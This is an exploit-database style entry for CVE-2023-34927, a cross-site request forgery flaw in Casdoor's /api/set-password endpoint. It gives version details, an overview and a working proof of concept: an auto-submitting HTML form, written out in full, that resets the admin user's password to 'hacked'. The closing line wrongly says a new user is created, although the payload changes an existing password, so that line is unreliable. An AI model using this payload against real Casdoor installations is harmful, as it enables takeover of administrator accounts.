# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF # Application: Casdoor # Version: <= 1.331.0 # Date: 03/07/2024 # Exploit Author: Van Lam Nguyen # Vendor Homepage: https://casdoor.org/ # Software Link: https://github.com/casdoor/casdoor # Tested on: Windows # CVE : CVE-2023-34927 Overview ================================================== Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password. This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL. Proof of Concept ================================================== Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step <html> <form action="http://localhost:8000/api/set-password" method="POST"> <input name='userOwner' value='built-in' type='hidden'> <input name='userName' value='admin' type='hidden'> <input name='newPassword' value='hacked' type='hidden'> <input type=submit> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </html> If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials userOwner: built-in userName: admin newPassword: hacked